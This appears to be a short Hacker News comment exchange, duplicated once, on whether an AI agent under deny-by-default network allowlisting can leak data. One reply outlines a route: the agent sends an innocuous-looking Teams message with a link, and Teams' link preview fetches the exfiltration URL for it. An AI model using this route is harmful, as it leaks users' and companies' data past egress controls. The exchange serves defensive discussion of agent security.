Only if it has access to exfiltrate data. We deny by default and the company has to allowlist each individual destination.
> Only if it has access to exfiltrate data.
Or if it has access to a tool call which allows it to exfiltrate data.
In the example identified, the AI agent never accesses the exfiltration URL.
The agent sends an innocuous-looking message to a user via a teams message.
MSTeams previews the link, accessing the exfiltration URL.
alt Hacker News
> Only if it has access to exfiltrate data.
Or if it has access to a tool call which allows it to exfiltrate data.
In the example identified, the AI agent never accesses the exfiltration URL.
The agent sends an innocuous-looking message to a user via a teams message.
MSTeams previews the link, accessing the exfiltration URL.